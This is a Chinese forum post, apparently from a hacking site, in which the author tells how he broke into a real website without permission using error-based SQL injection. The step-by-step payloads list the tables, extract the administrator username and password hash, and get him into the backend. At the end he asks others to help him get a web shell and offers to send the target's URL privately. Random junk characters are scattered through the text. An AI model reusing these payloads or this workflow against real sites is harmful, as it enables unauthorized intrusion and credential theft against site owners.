近一直在学习数据库方面的知识,一直在钻研PHP的一些高级注入语法,感觉比较的有意思。于是就在网上找有洞的网站练习手注。于是有了下文。3 L8 e0 [, O( u! u' p$ _
首先找到网站后台,加了个admin,后台出来了
0 X& y3 @# D: q* ^5 H1 [0 }/ ~/ J& J' ]9 J) O9 p1 b1 P
9 z$ @( W; R8 l2 S
然后看了下网站,发现貌似都是html静态网页,但是通过图片链接发现应该是伪静态,于是在后面加了个 ',报错了,初步判断可以注入
" ?1 {7 F/ r; v' rhttp://www.myhack58.com/Article/UploadPic/2012-12/20121218145843714.jpg 从报错语句中我们可以判断出存在frame_board_conference 表,知道存在frame_board_conference,可以方便我们后面的注入。这里我用的是错误回显注入。 首先查下数据库相关信息。 www.xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*) from+frame_board_conference+group+by+concat(0x3a,concat(0x3a,database(),0x3a,version()),floor(rand(0)*2)))—( u) n( z0 E! M P) H9 L6 R5 ^. t* J
! T5 `$ \7 `3 Y3 [* G
0 O& e1 b1 j+ u4 h" z4 V8 X& ]# e7 p7 e1 v8 h9 u" V& g
. q ?9 G' V9 U4 L* o
http://www.myhack58.com/Article/UploadPic/2012-12/20121218145846722.jpg2 y* z+ S! E4 U* k
3 n P3 g1 f! s/ S& K: C
* W6 H$ K4 \* D' l9 d" n
4 x7 L* C9 @: t2 ~; [$ h5 Y
$ L m0 P7 a- s) N3 u4 a可以看到数据库版本为5.0.32,存在information_schema表,可以进一步的注入。 然后我们查表 http://xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*)+from+frame_board_conference+group+by+concat(0x3a,(select+substr(group_concat(table_name),1,150)from+information_schema.tables+where+table_schema=database()),0x3a,floor(rand(0)*2)))-- 得到管理员表段frame_administrator3 x8 c# w5 \! }
' U7 R. ?& i2 Y% H3 b e
; z6 B& m* J! a5 p4 G5 y
http://www.myhack58.com/Article/UploadPic/2012-12/20121218145846695.jpg$ n4 `2 t c% Z4 n
$ _/ i0 l: F8 f$ r4 J7 b4 i
- S6 Z* c' }4 i7 J
查字段 http://www.xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*)+from+frame_board_conference+group+by+concat(0x3a,(select+substr(group_concat(column_name),1,150)from+information_schema.columns+where+table_name=0x6672616d655f61646d696e6973747261746f72),0x3a,floor(rand(0)*2)))--
1 J# k+ H5 z* f. M5 Y( f* A. e6 I; ?1 ^/ U
8 \1 F6 ` d1 `/ f b* T( i" ^1 v7 t/ a
$ T# o, {! t9 T* L) k7 ? 得到userID,userPass字段 最后 http://xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*)+from+frame_board_conference+group+by+concat(0x3a,(select+substr(group_concat(userID,0x3a,userPass,0x0a),1,150)from+frame_administrator),0x3a,floor(rand(0)*2)))--: |& \" k# s4 @/ ~, M8 d
3 e0 x( t1 I0 u/ w O6 X
$ ~- A6 H% ]4 m6 ]- L3 ~9 K
; x' p+ o. M% c% U7 o, _ 得到最终结果admin eb0a191797624dd3a48fa681d3061212 解密后成功进入后台,但是在获得shell的过程中出了点问题,可以穿php但是貌似无法解析,不知道什么原因,本人很菜,在这里希望大牛有兴趣的话帮忙拿下shell,感激不尽。Pm我,我把网址发给你。 |